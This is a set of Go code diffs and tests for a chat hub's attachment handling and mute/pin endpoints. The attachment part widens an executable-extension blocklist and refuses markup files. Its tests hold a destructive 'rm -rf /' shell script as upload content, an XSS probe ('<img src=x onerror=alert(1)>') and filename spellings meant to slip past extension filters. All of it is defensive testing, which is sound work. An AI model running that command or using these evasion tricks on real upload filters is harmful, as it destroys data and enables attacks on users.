+			t.Errorf("%s stored as %q, want %q", att.Name, att.MimeType, want[att.Name])
+		}
+	}
+}
+
+func TestAttachmentUpload_IgnoresClaimedContentType(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	// A shell script announcing itself as text/plain. The extension is
+	// blocked, and the claim does not change that.
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "install.sh", mime: "text/plain", content: "#!/bin/sh\nrm -rf /\n"},
+	})
+	if rec.Code != http.StatusBadRequest {
+		t.Fatalf("expected 400, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 0 {
+		t.Errorf("stored %d files, want 0", len(resp.Attachments))
+	}
+	if len(resp.Failures) != 1 || resp.Failures[0].Name != "install.sh" {
+		t.Fatalf("failures = %+v, want one entry for install.sh", resp.Failures)
+	}
+
+	// And the reverse: a PNG announcing itself as an executable type is stored
+	// for what it is.
+	rec = uploadAttachments(t, srv, []uploadFile{
+		{name: "photo.png", mime: "application/x-msdownload", content: "\x89PNG\r\n\x1a\n" + strings.Repeat("\x00", 16)},
+	})
+	if rec.Code != http.StatusCreated {
+		t.Fatalf("expected 201, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp = decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 1 || resp.Attachments[0].MimeType != "image/png" {
+		t.Fatalf("attachments = %+v, want one image/png", resp.Attachments)
+	}
+}
+
+func TestAttachmentUpload_PartialSuccess(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "good.json", mime: "application/octet-stream", content: `{"ok":true}`},
+		{name: "bad.exe", mime: "application/octet-stream", content: "MZ binary"},
+		{name: "also-good.log", mime: "application/octet-stream", content: "started\n"},
+	})
+
+	// Something was created, so the request created something: 201, with the
+	// per-file outcome in the body.
+	if rec.Code != http.StatusCreated {
+		t.Fatalf("expected 201 for a partial success, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 2 {
+		t.Errorf("stored %d files, want 2 (the bad one must not take the good ones down): %s",
+			len(resp.Attachments), rec.Body.String())
+	}
+	if len(resp.Failures) != 1 || resp.Failures[0].Name != "bad.exe" {
+		t.Fatalf("failures = %+v, want one entry for bad.exe", resp.Failures)
+	}
+	if resp.Failures[0].Error == "" {
+		t.Error("failure carries no reason; the composer has nothing to show the user")
+	}
+}
+
+func TestAttachmentUpload_AllFilesRejected(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "a.exe", mime: "application/octet-stream", content: "MZ"},
+		{name: "b.bat", mime: "text/plain", content: "@echo off"},
+	})
+	if rec.Code != http.StatusBadRequest {
+		t.Fatalf("expected 400 when nothing was created, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Failures) != 2 {
+		t.Errorf("failures = %+v, want both files reported", resp.Failures)
+	}
+}
+
+func TestAttachmentUpload_OversizedFileIsAPerFileFailure(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "small.txt", mime: "text/plain", content: "hi"},
+		{name: "huge.log", mime: "text/plain", content: strings.Repeat("x", MaxAttachmentSize+1)},
+	})
+	if rec.Code != http.StatusCreated {
+		t.Fatalf("expected 201, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 1 || resp.Attachments[0].Name != "small.txt" {
+		t.Fatalf("attachments = %+v, want just small.txt", resp.Attachments)
+	}
+	if len(resp.Failures) != 1 || resp.Failures[0].Name != "huge.log" {
+		t.Fatalf("failures = %+v, want one entry for huge.log", resp.Failures)
+	}
+	if !strings.Contains(resp.Failures[0].Error, "maximum size") {
+		t.Errorf("failure reason = %q, want it to mention the size limit", resp.Failures[0].Error)
+	}
+}

--- a/pkg/hub/attachments.go
+++ b/pkg/hub/attachments.go
@@ -23,6 +23,7 @@ import (
 	"path/filepath"
 	"strings"
 	"time"
+	"unicode"
 
 	"github.com/google/uuid"
 )
@@ -91,11 +92,70 @@ var AllowedMimeTypes = map[string]bool{
 }
 
 // DangerousExtensions lists extensions that should be rejected even if
-// the MIME type is spoofed.
+// the MIME type is spoofed. The subject is execution: a file that a recipient,
+// or something running on the recipient's machine, will run by opening it.
+//
+// Entries are grouped with their peers on purpose. A blocklist whose holes sit
+// immediately beside its entries is the worst kind: .js was blocked while .mjs
+// — the same source, run by the same engines — was not, and the gap read as a
+// judgement rather than as an omission.
 var DangerousExtensions = map[string]bool{
+	// Windows executables and installers.
 	".exe": true, ".bat": true, ".cmd": true, ".com": true,
-	".msi": true, ".scr": true, ".pif": true, ".vbs": true,
-	".js": true, ".jar": true, ".sh": true, ".ps1": true,
+	".msi": true, ".scr": true, ".pif": true,
+	// HTML Application: markup, but mshta runs it with full local trust, so it
+	// belongs with the executables rather than with the markup extensions the
+	// classifier refuses.
+	".hta": true,
+	// Script engines. .vbs and .js, their encoded forms, the ES module and
+	// CommonJS spellings of the same JavaScript, and the Windows Script Host
+	// files that exist to run them.
+	".vbs": true, ".vbe": true, ".js": true, ".jse": true,
+	".mjs": true, ".cjs": true, ".wsf": true, ".wsh": true,
+	".jar": true,
+	// PowerShell: the script and the module the same host loads and executes.
+	".ps1": true, ".psm1": true,
+	// Shell scripts under the names shells and desktops actually run, plus the
+	// two launcher formats whose whole purpose is to run a command on
+	// double-click.
+	".sh": true, ".bash": true, ".zsh": true, ".ksh": true, ".csh": true,
+	".command": true, ".desktop": true,
+}
+
+// attachmentExt returns the lower-cased extension that the blocklist above and
+// the classifier's text-like list both judge. It is deliberately the only such
+// parse: two copies of "lower-case filepath.Ext" is how two answers to the same
+// question begin to disagree.
+//
+// The name is normalised first, because the blocklist is a claim about the file
+// a recipient ends up with rather than about the exact bytes of the upload's
+// filename. Windows drops trailing dots and spaces when it creates a file, so
+// "payload.sh " arrives on disk as "payload.sh"; a zero-width space or a NUL
+// inside the extension is invisible in every UI that will ever show the name.
+// Both spellings reached the disk as an accepted text file before this. Trailing
+// noise is trimmed and invisible runes are dropped so that every spelling of an
+// extension is judged as the extension it will behave as.
+func attachmentExt(name string) string {
+	name = strings.TrimRightFunc(name, func(r rune) bool {
+		return r == '.' || isIgnorableFilenameRune(r)
+	})
+	return strings.Map(func(r rune) rune {
+		if isIgnorableFilenameRune(r) {
+			return -1
+		}
+		return unicode.ToLower(r)
+	}, filepath.Ext(name))
+}
+
+// isIgnorableFilenameRune reports whether a rune carries no visible weight in a
+// filename: spaces and other whitespace, control characters including NUL, and
+// the format characters — zero-width spaces, joiners, bidi overrides.
+//
+// Homoglyphs are a different problem and are not addressed here: "a.ѕh" with a
+// Cyrillic es is a visually confusable name, not an invisible character, and
+// nothing on the receiving end treats it as ".sh".
+func isIgnorableFilenameRune(r rune) bool {
+	return unicode.IsSpace(r) || unicode.IsControl(r) || unicode.Is(unicode.Cf, r)
 }
 
 // IsImageMime returns true if the MIME type is an image type that should
@@ -122,12 +182,14 @@ func SanitizeFilename(name string) (string, error) {
 	name = strings.ReplaceAll(name, "/", "_")
 	name = strings.ReplaceAll(name, "\\", "_")
 	// Check for dangerous extensions.
-	ext := strings.ToLower(filepath.Ext(name))
-	if DangerousExtensions[ext] {
+	if ext := attachmentExt(name); DangerousExtensions[ext] {
 		return "", fmt.Errorf("dangerous file extension: %s", ext)
 	}
-	// Truncate if too long (preserve extension).
+	// Truncate if too long (preserve extension). This parse is about keeping a
+	// recognisable suffix on a shortened name, not about judging it, so it uses
+	// the extension as written.
 	if len(name) > MaxFilenameLength {
+		ext := strings.ToLower(filepath.Ext(name))
 		base := strings.TrimSuffix(name, ext)
 		maxBase := MaxFilenameLength - len(ext)
 		if maxBase < 1 {

--- a/pkg/hub/attachments.go
+++ b/pkg/hub/attachments.go
@@ -170,7 +170,7 @@ func IsImageMime(mime string) bool {
 }
 
 // SanitizeFilename strips path components, limits length, and rejects
-// dangerous extensions.
+// dangerous and markup extensions.
 func SanitizeFilename(name string) (string, error) {
 	// Strip any directory components.
 	name = filepath.Base(name)
@@ -181,9 +181,16 @@ func SanitizeFilename(name string) (string, error) {
 	// Replace any remaining path separators.
 	name = strings.ReplaceAll(name, "/", "_")
 	name = strings.ReplaceAll(name, "\\", "_")
-	// Check for dangerous extensions.
-	if ext := attachmentExt(name); DangerousExtensions[ext] {
+	// Check for refused extensions. This is the one gate both entry points
+	// share — the browser upload handler and the agent --attach path — so both
+	// classes of refusal are judged here, off the same canonical extension.
+	// Markup is refused because it would be served back as its own document
+	// type; #1098 tracks re-admitting it safely.
+	switch ext := attachmentExt(name); {
+	case DangerousExtensions[ext]:
 		return "", fmt.Errorf("dangerous file extension: %s", ext)
+	case refusedMarkupExtensions[ext]:
+		return "", fmt.Errorf("files with a %s extension are not accepted", ext)
 	}
 	// Truncate if too long (preserve extension). This parse is about keeping a
 	// recognisable suffix on a shortened name, not about judging it, so it uses

--- a/pkg/hub/attachments_agent.go
+++ b/pkg/hub/attachments_agent.go
@@ -221,7 +221,11 @@ func (s *Server) storeAgentAttachment(ctx context.Context, wcs WebChatStore, as 
 
 	if err := wcs.CreateAttachment(ctx, meta); err != nil {
 		// Leave no orphaned bytes behind when the metadata row fails.
-		_ = as.Delete(ctx, projectID, meta.ID)
+		if delErr := as.Delete(ctx, projectID, meta.ID); delErr != nil {
+			// The blob is orphaned after all. Say so: nothing else will.
+			s.messageLog.Error("Failed to delete orphaned attachment blob",
+				"project_id", projectID, "attachment", meta.ID, "error", delErr)
+		}
 		return AttachmentRef{}, err
 	}
 

--- a/pkg/hub/attachments_agent.go
+++ b/pkg/hub/attachments_agent.go
@@ -64,13 +64,16 @@ var agentAttachmentMimes = map[string]string{
 	".yaml": "application/x-yaml",
 	".yml":  "application/x-yaml",
 
-	".go":   "text/plain",
-	".py":   "text/plain",
-	".rs":   "text/plain",
-	".ts":   "text/plain",
-	".tsx":  "text/plain",
-	".jsx":  "text/plain",
-	".sql":  "text/plain",
+	".go":  "text/plain",
+	".py":  "text/plain",
+	".rs":  "text/plain",
+	".ts":  "text/plain",
+	".tsx": "text/plain",
+	".jsx": "text/plain",
+	".sql": "text/plain",
+	// Unreachable while SanitizeFilename refuses markup extensions: an .html
+	// attachment never gets this far. Kept so the mapping is already right if
+	// #1098 re-admits the type.
 	".html": "text/html",
 	".css":  "text/css",
 	".xml":  "text/xml",

--- a/pkg/hub/attachments_agent_test.go
+++ b/pkg/hub/attachments_agent_test.go
@@ -217,6 +217,21 @@ func TestIngestAgentAttachments(t *testing.T) {
 	}
 }
 
+// The agent path never calls ClassifyAttachment, so the markup refusal only
+// reaches it through SanitizeFilename. Before that, an agent could publish an
+// .html file into a chat and the hub would store it as text/html.
+func TestIngestAgentAttachments_RefusesMarkup(t *testing.T) {
+	srv, _, project, sharedDir := agentAttachmentServer(t)
+
+	for _, name := range []string{"evil.html", "diagram.svg", "page.htm "} {
+		staged := stageAgentFile(t, sharedDir, name, `<img src=x onerror=alert(1)>`)
+		refs := srv.ingestAgentAttachments(context.Background(), project.ID, "agent-1", []string{staged})
+		if len(refs) != 0 {
+			t.Errorf("%q was published as %+v; markup extensions are refused on both paths", name, refs)
+		}
+	}
+}
+
 func TestIngestAgentAttachments_RejectsSymlink(t *testing.T) {
 	srv, _, project, sharedDir := agentAttachmentServer(t)
 

--- a/pkg/hub/attachments_test.go
+++ b/pkg/hub/attachments_test.go
@@ -111,11 +111,11 @@ func TestAttachmentExt_NormalisesTrailingAndInvisibleCharacters(t *testing.T) {
 		{"a.sh\t", ".sh"},
 		{"a.sh\n", ".sh"},
 		{"a.sh\x00", ".sh"},
-		{"a.sh​", ".sh"},      // zero-width space
+		{"a.sh\u200b", ".sh"}, // zero-width space
 		{"a.sh ", ".sh"},      // no-break space
-		{"a.s​h", ".sh"},      // zero-width space inside the extension
+		{"a.s\u200bh", ".sh"}, // zero-width space inside the extension
 		{"a.s\x00h", ".sh"},   // NUL inside the extension
-		{"a.‮sh", ".sh"},      // right-to-left override
+		{"a.\u202esh", ".sh"}, // right-to-left override
 		{"notes.txt", ".txt"}, // the ordinary case is unchanged
 		{"archive.tar.gz", ".gz"},
 		{"noext", ""},
@@ -132,7 +132,7 @@ func TestAttachmentExt_NormalisesTrailingAndInvisibleCharacters(t *testing.T) {
 func TestSanitizeFilename_TrailingCharactersDoNotDefeatTheBlocklist(t *testing.T) {
 	variants := []string{
 		"a.sh ", "a.sh.", "a.sh\t", "a.sh\n", "a.sh\x00",
-		"a.sh​", "a.sh ", "a.SH ", "a.s\x00h", "payload.sh...",
+		"a.sh\u200b", "a.sh ", "a.SH ", "a.s\x00h", "payload.sh...",
 	}
 	for _, v := range variants {
 		_, err := SanitizeFilename(v)

--- a/pkg/hub/attachments_test.go
+++ b/pkg/hub/attachments_test.go
@@ -158,6 +158,20 @@ func TestSanitizeFilename_RejectsPeersOfBlockedExtensions(t *testing.T) {
 	}
 }
 
+// SanitizeFilename is the gate both entry points share, so the markup refusal
+// has to be enforced here and not only in ClassifyAttachment — otherwise the
+// agent --attach path, which never classifies, still accepts .html.
+func TestSanitizeFilename_RefusesMarkupExtensions(t *testing.T) {
+	for _, f := range []string{
+		"evil.html", "evil.htm", "evil.xhtml", "evil.shtml", "evil.mhtml", "evil.mht",
+		"diagram.svg", "EVIL.HTML", "evil.html ", "evil.html.",
+	} {
+		_, err := SanitizeFilename(f)
+		require.Error(t, err, "SanitizeFilename(%q) was accepted", f)
+		assert.Contains(t, err.Error(), "not accepted", "for %q", f)
+	}
+}
+
 // Widening the blocklist must not swallow the developer formats #1045 exists to
 // let through. These are the near neighbours of the new entries.
 func TestSanitizeFilename_KeepsAcceptedDeveloperFormats(t *testing.T) {

--- a/pkg/hub/attachments_test.go
+++ b/pkg/hub/attachments_test.go
@@ -89,6 +89,86 @@ func TestSanitizeFilename_TruncateLong(t *testing.T) {
 }
 
 // ---------------------------------------------------------------------------
+// attachmentExt / blocklist normalisation tests
+// ---------------------------------------------------------------------------
+
+// The blocklist judges the file the recipient ends up with. Windows drops
+// trailing dots and spaces when it creates a file, and a zero-width space or a
+// NUL is invisible wherever the name is shown, so every spelling below is the
+// same file to whoever receives it and must be the same extension here.
+func TestAttachmentExt_NormalisesTrailingAndInvisibleCharacters(t *testing.T) {
+	tests := []struct {
+		input string
+		want  string
+	}{
+		{"a.sh", ".sh"},
+		{"a.SH", ".sh"},
+		{"a.sh ", ".sh"},
+		{"a.sh  ", ".sh"},
+		{"a.sh.", ".sh"},
+		{"a.sh...", ".sh"},
+		{"a.sh. . ", ".sh"},
+		{"a.sh\t", ".sh"},
+		{"a.sh\n", ".sh"},
+		{"a.sh\x00", ".sh"},
+		{"a.sh​", ".sh"},      // zero-width space
+		{"a.sh ", ".sh"},      // no-break space
+		{"a.s​h", ".sh"},      // zero-width space inside the extension
+		{"a.s\x00h", ".sh"},   // NUL inside the extension
+		{"a.‮sh", ".sh"},      // right-to-left override
+		{"notes.txt", ".txt"}, // the ordinary case is unchanged
+		{"archive.tar.gz", ".gz"},
+		{"noext", ""},
+		{"...", ""},
+	}
+	for _, tt := range tests {
+		assert.Equal(t, tt.want, attachmentExt(tt.input), "attachmentExt(%q)", tt.input)
+	}
+}
+
+// Every spelling the security audit landed on disk. A control a trailing space
+// defeats is not a control, and the decision to keep executables out of a
+// scratchpad rests on this one.
+func TestSanitizeFilename_TrailingCharactersDoNotDefeatTheBlocklist(t *testing.T) {
+	variants := []string{
+		"a.sh ", "a.sh.", "a.sh\t", "a.sh\n", "a.sh\x00",
+		"a.sh​", "a.sh ", "a.SH ", "a.s\x00h", "payload.sh...",
+	}
+	for _, v := range variants {
+		_, err := SanitizeFilename(v)
+		require.Error(t, err, "SanitizeFilename(%q) was accepted", v)
+		assert.Contains(t, err.Error(), "dangerous file extension", "for %q", v)
+	}
+}
+
+// The blocklist should have no hole immediately beside an entry it already
+// carries: the same code, the same interpreter, a different suffix.
+func TestSanitizeFilename_RejectsPeersOfBlockedExtensions(t *testing.T) {
+	peers := []string{
+		"mod.mjs", "mod.cjs", "enc.jse", // .js
+		"enc.vbe", "run.wsf", "run.wsh", // .vbs / Windows Script Host
+		"module.psm1",                                            // .ps1
+		"run.bash", "run.zsh", "run.ksh", "run.csh", "x.command", // .sh
+		"launch.desktop", // double-click launcher
+		"app.hta",        // markup that mshta runs with full trust
+	}
+	for _, f := range peers {
+		_, err := SanitizeFilename(f)
+		require.Error(t, err, "SanitizeFilename(%q) was accepted", f)
+	}
+}
+
+// Widening the blocklist must not swallow the developer formats #1045 exists to
+// let through. These are the near neighbours of the new entries.
+func TestSanitizeFilename_KeepsAcceptedDeveloperFormats(t *testing.T) {
+	for _, f := range []string{"app.jsx", "app.ts", "app.tsx", "main.go", "script.py", "notes.md", "data.json"} {
+		name, err := SanitizeFilename(f)
+		require.NoError(t, err, "SanitizeFilename(%q)", f)
+		assert.Equal(t, f, name)
+	}
+}
+
+// ---------------------------------------------------------------------------
 // IsImageMime tests
 // ---------------------------------------------------------------------------
 

--- a/pkg/hub/handlers_chat_mute_pin_test.go
+++ b/pkg/hub/handlers_chat_mute_pin_test.go
@@ -1,0 +1,455 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+//go:build !no_sqlite
+
+package hub
+
+import (
+	"context"
+	"database/sql"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+
+	"github.com/GoogleCloudPlatform/scion/pkg/store"
+	_ "github.com/mattn/go-sqlite3"
+)
+
+// setupMutePinTest builds a server with a web chat store, one project and one
+// topic in it, owned by nobody in particular — the dev-auth user is an admin so
+// it can read the project.
+func setupMutePinTest(t *testing.T) (*Server, store.Store, WebChatStore, *store.Project, string) {
+	t.Helper()
+	srv, s := testServer(t)
+	ctx := context.Background()
+
+	proj := &store.Project{
+		ID: tid("mutepin-proj"), Name: "mutepin", Slug: "mutepin",
+		Created: time.Now(), Updated: time.Now(),
+	}
+	if err := s.CreateProject(ctx, proj); err != nil {
+		t.Fatalf("CreateProject: %v", err)
+	}
+
+	db, err := sql.Open("sqlite3", ":memory:")
+	if err != nil {
+		t.Fatalf("open sqlite: %v", err)
+	}
+	t.Cleanup(func() { _ = db.Close() })
+	wcs := NewWebChatStore(db, "sqlite3")
+	if err := wcs.Init(); err != nil {
+		t.Fatalf("Init: %v", err)
+	}
+	srv.SetWebChatStore(wcs)
+
+	topicID := tid("mutepin-topic")
+	if err := wcs.CreateTopic(ctx, WebChatTopic{
+		ID:        topicID,
+		ProjectID: proj.ID,
+		Name:      "mutable",
+		CreatedBy: DevUserID,
+		CreatedAt: time.Now().UTC(),
+	}); err != nil {
+		t.Fatalf("CreateTopic: %v", err)
+	}
+
+	return srv, s, wcs, proj, topicID
+}
+
+// setupChatAuthzTest builds a server whose project has a real members group and
+// policy, so a user outside the project is genuinely refused rather than
+// waved through by the dev-auth admin.
+func setupChatAuthzTest(t *testing.T) (*Server, store.Store, WebChatStore, *store.Project) {
+	t.Helper()
+	srv, s, _, _, project := setupDemoPolicyTest(t)
+
+	db, err := sql.Open("sqlite3", ":memory:")
+	if err != nil {
+		t.Fatalf("open sqlite: %v", err)
+	}
+	t.Cleanup(func() { _ = db.Close() })
+	wcs := NewWebChatStore(db, "sqlite3")
+	if err := wcs.Init(); err != nil {
+		t.Fatalf("Init: %v", err)
+	}
+	srv.SetWebChatStore(wcs)
+
+	return srv, s, wcs, project
+}
+
+// ---------------------------------------------------------------------------
+// #1029 — PUT /api/v1/chat/conversations/{key}/mute
+// ---------------------------------------------------------------------------
+
+func TestChatV2_Mute_SetAndClear(t *testing.T) {
+	srv, _, wcs, _, topicID := setupMutePinTest(t)
+	ctx := context.Background()
+
+	tests := []struct {
+		name  string
+		muted bool
+	}{
+		{"mute", true},
+		{"unmute", false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			rec := doRequest(t, srv, http.MethodPut,
+				"/api/v1/chat/conversations/"+topicID+"/mute",
+				map[string]bool{"muted": tt.muted})
+			if rec.Code != http.StatusOK {
+				t.Fatalf("expected 200, got %d: %s", rec.Code, rec.Body.String())
+			}
+
+			var resp struct {
+				Muted bool `json:"muted"`
+			}
+			if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
+				t.Fatalf("decode: %v", err)
+			}
+			if resp.Muted != tt.muted {
+				t.Errorf("response muted = %v, want %v", resp.Muted, tt.muted)
+			}
+
+			stored, err := wcs.IsConversationMuted(ctx, DevUserID, topicID)
+			if err != nil {
+				t.Fatalf("IsConversationMuted: %v", err)
+			}
+			if stored != tt.muted {
+				t.Errorf("stored muted = %v, want %v", stored, tt.muted)
+			}
+		})
+	}
+}
+
+func TestChatV2_Mute_DMParticipant(t *testing.T) {
+	srv, _, wcs, _, _ := setupMutePinTest(t)
+	ctx := context.Background()
+
+	dmKey := "dm:user:" + DevUserID + ":user:" + tid("mute-dm-peer")
+
+	rec := doRequest(t, srv, http.MethodPut,
+		"/api/v1/chat/conversations/"+dmKey+"/mute", map[string]bool{"muted": true})
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	muted, err := wcs.IsConversationMuted(ctx, DevUserID, dmKey)
+	if err != nil {
+		t.Fatalf("IsConversationMuted: %v", err)
+	}
+	if !muted {
+		t.Error("DM should be muted after PUT")
+	}
+}
+
+func TestChatV2_Mute_RejectsBadRequests(t *testing.T) {
+	srv, _, _, _, topicID := setupMutePinTest(t)
+
+	tests := []struct {
+		name     string
+		method   string
+		key      string
+		body     interface{}
+		raw      []byte
+		wantCode int
+	}{
+		{"get is not allowed", http.MethodGet, topicID, nil, nil, http.StatusMethodNotAllowed},
+		{"post is not allowed", http.MethodPost, topicID, map[string]bool{"muted": true}, nil, http.StatusMethodNotAllowed},
+		{"delete is not allowed", http.MethodDelete, topicID, nil, nil, http.StatusMethodNotAllowed},
+		{"malformed body", http.MethodPut, topicID, nil, []byte("{not json"), http.StatusBadRequest},
+		{"missing muted field", http.MethodPut, topicID, map[string]string{"other": "x"}, nil, http.StatusBadRequest},
+		{"unknown topic", http.MethodPut, tid("mutepin-missing"), map[string]bool{"muted": true}, nil, http.StatusNotFound},
+		{"malformed DM key", http.MethodPut, "dm:user:nope", map[string]bool{"muted": true}, nil, http.StatusBadRequest},
+		{
+			"DM the caller is not part of", http.MethodPut,
+			"dm:user:" + tid("stranger-a") + ":user:" + tid("stranger-b"),
+			map[string]bool{"muted": true}, nil, http.StatusForbidden,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			path := "/api/v1/chat/conversations/" + tt.key + "/mute"
+			var rec = func() *httptest.ResponseRecorder {
+				if tt.raw != nil {
+					return doRequestRaw(t, srv, tt.method, path, tt.raw, "application/json")
+				}
+				return doRequest(t, srv, tt.method, path, tt.body)
+			}()
+			if rec.Code != tt.wantCode {
+				t.Errorf("expected %d, got %d: %s", tt.wantCode, rec.Code, rec.Body.String())
+			}
+		})
+	}
+}
+
+func TestChatV2_Mute_Unauthenticated(t *testing.T) {
+	srv, _, _, _, topicID := setupMutePinTest(t)
+
+	rec := doRequestNoAuth(t, srv, http.MethodPut,
+		"/api/v1/chat/conversations/"+topicID+"/mute", map[string]bool{"muted": true})
+	if rec.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401 without auth, got %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
+// A user with no read access to the topic's project must not be able to mute
+// it — muting a conversation you cannot read would leak its existence and let
+// a stranger write to another user's read-state row.
+func TestChatV2_MutePin_ForbiddenForNonMember(t *testing.T) {
+	srv, s, wcs, project := setupChatAuthzTest(t)
+	ctx := context.Background()
+
+	topicID := tid("authz-topic")
+	if err := wcs.CreateTopic(ctx, WebChatTopic{
+		ID:        topicID,
+		ProjectID: project.ID,
+		Name:      "private",
+		CreatedBy: "alice",
+		CreatedAt: time.Now().UTC(),
+	}); err != nil {
+		t.Fatalf("CreateTopic: %v", err)
+	}
+
+	// Deliberately not a hub member: the seeded hub-member-read-all policy
+	// grants project read to every hub member, so an outsider is the user the
+	// project's read authorization actually turns away.
+	outsider := &store.User{
+		ID:          tid("chat-outsider"),
+		Email:       "outsider@test.com",
+		DisplayName: "Outsider",
+		Role:        store.UserRoleMember,
+		Status:      "active",
+		Created:     time.Now(),
+	}
+	if err := s.CreateUser(ctx, outsider); err != nil {
+		t.Fatalf("CreateUser: %v", err)
+	}
+
+	for _, action := range []struct {
+		route string
+		body  map[string]bool
+	}{
+		{"mute", map[string]bool{"muted": true}},
+		{"pin", map[string]bool{"pinned": true}},
+	} {
+		t.Run(action.route, func(t *testing.T) {
+			rec := doRequestAsUser(t, srv, outsider, http.MethodPut,
+				"/api/v1/chat/conversations/"+topicID+"/"+action.route, action.body)
+			if rec.Code != http.StatusForbidden {
+				t.Fatalf("expected 403 for non-member, got %d: %s", rec.Code, rec.Body.String())
+			}
+		})
+	}
+
+	// Nothing was written for the outsider.
+	muted, err := wcs.IsConversationMuted(ctx, outsider.ID, topicID)
+	if err != nil {
+		t.Fatalf("IsConversationMuted: %v", err)
+	}
+	if muted {
+		t.Error("refused request must not have muted the conversation")
+	}
+}
+
+// ---------------------------------------------------------------------------
+// #1030 — PUT /api/v1/chat/conversations/{key}/pin
+// ---------------------------------------------------------------------------
+
+func TestChatV2_Pin_SetAndClear(t *testing.T) {
+	srv, _, wcs, _, topicID := setupMutePinTest(t)
+	ctx := context.Background()
+
+	tests := []struct {
+		name   string
+		pinned bool
+	}{
+		{"pin", true},
+		{"unpin", false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			rec := doRequest(t, srv, http.MethodPut,
+				"/api/v1/chat/conversations/"+topicID+"/pin",
+				map[string]bool{"pinned": tt.pinned})
+			if rec.Code != http.StatusOK {
+				t.Fatalf("expected 200, got %d: %s", rec.Code, rec.Body.String())
+			}
+
+			var resp struct {
+				Pinned bool `json:"pinned"`
+			}
+			if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
+				t.Fatalf("decode: %v", err)
+			}
+			if resp.Pinned != tt.pinned {
+				t.Errorf("response pinned = %v, want %v", resp.Pinned, tt.pinned)
+			}
+
+			rs, err := wcs.GetReadState(ctx, DevUserID, topicID)
+			if err != nil {
+				t.Fatalf("GetReadState: %v", err)
+			}
+			if rs == nil {
+				t.Fatal("expected a read state row after pinning")
+			}
+			if rs.Pinned != tt.pinned {
+				t.Errorf("stored pinned = %v, want %v", rs.Pinned, tt.pinned)
+			}
+		})
+	}
+}
+
+func TestChatV2_Pin_RejectsBadRequests(t *testing.T) {
+	srv, _, _, _, topicID := setupMutePinTest(t)
+
+	tests := []struct {
+		name     string
+		method   string
+		key      string
+		body     interface{}
+		raw      []byte
+		wantCode int
+	}{
+		{"get is not allowed", http.MethodGet, topicID, nil, nil, http.StatusMethodNotAllowed},
+		{"post is not allowed", http.MethodPost, topicID, map[string]bool{"pinned": true}, nil, http.StatusMethodNotAllowed},
+		{"malformed body", http.MethodPut, topicID, nil, []byte("{nope"), http.StatusBadRequest},
+		{"missing pinned field", http.MethodPut, topicID, map[string]string{"other": "x"}, nil, http.StatusBadRequest},
+		{"unknown topic", http.MethodPut, tid("pin-missing"), map[string]bool{"pinned": true}, nil, http.StatusNotFound},
+		{
+			"DM the caller is not part of", http.MethodPut,
+			"dm:user:" + tid("stranger-c") + ":user:" + tid("stranger-d"),
+			map[string]bool{"pinned": true}, nil, http.StatusForbidden,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			path := "/api/v1/chat/conversations/" + tt.key + "/pin"
+			var rec = func() *httptest.ResponseRecorder {
+				if tt.raw != nil {
+					return doRequestRaw(t, srv, tt.method, path, tt.raw, "application/json")
+				}
+				return doRequest(t, srv, tt.method, path, tt.body)
+			}()
+			if rec.Code != tt.wantCode {
+				t.Errorf("expected %d, got %d: %s", tt.wantCode, rec.Code, rec.Body.String())
+			}
+		})
+	}
+}
+
+func TestChatV2_Pin_Unauthenticated(t *testing.T) {
+	srv, _, _, _, topicID := setupMutePinTest(t)
+
+	rec := doRequestNoAuth(t, srv, http.MethodPut,
+		"/api/v1/chat/conversations/"+topicID+"/pin", map[string]bool{"pinned": true})
+	if rec.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401 without auth, got %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
+// ---------------------------------------------------------------------------
+// API surface: the rail can only render the state it is told about.
+// ---------------------------------------------------------------------------
+
+func TestChatV2_ThreadsList_ReportsMutedAndPinned(t *testing.T) {
+	srv, _, _, proj, topicID := setupMutePinTest(t)
+
+	for _, route := range []struct {
+		name string
+		body map[string]bool
+	}{
+		{"mute", map[string]bool{"muted": true}},
+		{"pin", map[string]bool{"pinned": true}},
+	} {
+		rec := doRequest(t, srv, http.MethodPut,
+			"/api/v1/chat/conversations/"+topicID+"/"+route.name, route.body)
+		if rec.Code != http.StatusOK {
+			t.Fatalf("PUT %s: expected 200, got %d: %s", route.name, rec.Code, rec.Body.String())
+		}
+	}
+
+	rec := doRequest(t, srv, http.MethodGet,
